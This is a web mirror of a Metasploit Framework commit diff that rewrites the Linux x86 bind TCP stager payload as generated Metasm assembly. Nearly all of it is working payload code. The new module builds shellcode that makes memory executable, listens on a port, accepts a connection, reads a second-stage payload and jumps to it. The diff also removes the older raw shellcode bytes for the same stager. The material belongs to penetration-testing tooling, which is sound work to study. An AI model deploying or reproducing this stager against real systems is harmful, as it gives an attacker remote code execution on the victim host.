infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Porting bind_tcp for posix to metasm 

And supporting SO_REUSEADDR and stageless meterp
bug/bundler_fix
OJ 2015-04-18 19:19:40 +10:00
parent 97912882ca
commit 19f8a76475
2 changed files with 187 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

179
lib/msf/core/payload/linux/bind_tcp.rb Normal file
View File

@ -0,0 +1,179 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf
###
#
# Complex bindtcp payload generation for Linux ARCH_X86
#
###
module Payload::Linux::BindTcp
include Msf::Payload::Linux
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'],
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'],
close_socket: close_listen_socket,
reliable: true
}
generate_bind_tcp(conf)
end
#
# Generate and compile the stager
#
def generate_bind_tcp(opts={})
asm = asm_bind_tcp(opts)
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
space += 14
# Adding 6 bytes to the payload when we include the closing of the listen
# socket
space += 6 if close_listen_socket
# The final estimated size
space
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [Fixnum] :port The port to connect to
# @option opts [Bool] :reliable Whether or not to enable error handling code
#
def asm_bind_tcp(opts={})
#reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
STDERR.puts("#{opts.inspect}\n")
asm = %Q^
bind_tcp:
push 0x7d ; mprotect syscall
pop eax
cdq
mov dl,0x7
mov ecx,0x1000
mov ebx,esp
and bx,0xf000
int 0x80 ; invoke mprotect
xor ebx,ebx
mul ebx
push ebx ; PROTO
inc ebx ; SYS_SOCKET and SOCK_STREAM
push ebx
push 0x2 ; SYS_BIND and AF_INET
mov ecx,esp
mov al,0x66 ; socketcall syscall
int 0x80 ; invoke socketcall (SYS_SOCKET)
^
unless close_socket
asm << %Q^
; set the SO_REUSEADDR flag on the socket
push ecx
push 4
push esp
push 2
push 1
push eax
xchg eax,edi ; stash the socket handle
mov ecx, esp
push 0xe ; SYS_SETSOCKOPT
pop ebx
push 0x66 ; socketcall syscall
pop eax
int 0x80
xchg eax,edi ; restore the socket handle
add esp, 0x14
^
end
asm << %Q^
pop ebx
pop esi
push edx
push #{encoded_port}
push 0x10
push ecx
push eax
mov ecx,esp
push 0x66 ; socketcall syscall
pop eax
int 0x80 ; invoke socketcall (SYS_BIND)
shl ebx,1 ; SYS_LISTEN
mov al,0x66 ; socketcall syscall (SYS_LISTEN)
int 0x80 ; invoke socketcall
^
if close_socket
asm << %Q^
push eax ; stash the listen socket
^
end
asm << %Q^
inc ebx ; SYS_ACCEPT
mov al,0x66 ; socketcall syscall
mov [ecx+0x4],edx
int 0x80 ; invoke socketcall (SYS_ACCEPT)
xchg eax,ebx
mov dh,0xc ; at least 0x0c00 bytes
mov al,0x3 ; read syscall
int 0x80 ; invoke read
xchg ebx,edi ; stash the accept socket in edi
^
if close_socket
asm << %Q^
pop ebx ; restore the listen socket
mov al,0x6 ; close syscall
int 0x80 ; invoke close
^
end
asm << %Q^
jmp ecx ; jump to the payload
^
asm
end
end
end

76
modules/payloads/stagers/linux/x86/bind_tcp.rb
View File

@ -6,86 +6,26 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/linux/bind_tcp'
###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module Metasploit3
module Metasploit4
CachedSize = 79
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Linux::BindTcp
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Description' => 'Listen for a connection',
'Author' => [
'skape', # original
'egypt', # NX support
],
'Name' => 'Bind TCP Stager (Linux x86)',
'Description' => 'Listen for a connection (Linux x86)',
'Author' => [ 'skape', 'egypt', ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 0x29, 'n' ],
},
'Payload' =>
"\x6a\x7d" +# push byte +0x7d
"\x58" +# pop eax
"\x99" +# cdq
"\xb2\x07" +# mov dl,0x7
"\xb9\x00\x10\x00\x00" +# mov ecx,0x1000
"\x89\xe3" +# mov ebx,esp
"\x66\x81\xe3\x00\xf0" +# and bx,0xf000
"\xcd\x80" +# int 0x80
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x02" +# push byte +0x2
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x5b" +# pop ebx
"\x5e" +# pop esi
"\x52" +# push edx
"\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002
"\x6a\x10" +# push byte +0x10
"\x51" +# push ecx
"\x50" +# push eax
"\x89\xe1" +# mov ecx,esp
"\x6a\x66" +# push byte +0x66
"\x58" +# pop eax
"\xcd\x80" +# int 0x80
"\xd1\xe3" +# shl ebx,1
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x43" +# inc ebx
"\xb0\x66" +# mov al,0x66
"\x89\x51\x04" +# mov [ecx+0x4],edx
"\xcd\x80" +# int 0x80
"\x93" +# xchg eax,ebx
"\xb6\x0c" +# mov dh,0xc
"\xb0\x03" +# mov al,0x3
"\xcd\x80" +# int 0x80
"\x89\xdf" +# mov edi,ebx
"\xff\xe1" # jmp ecx
}
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => true }
))
end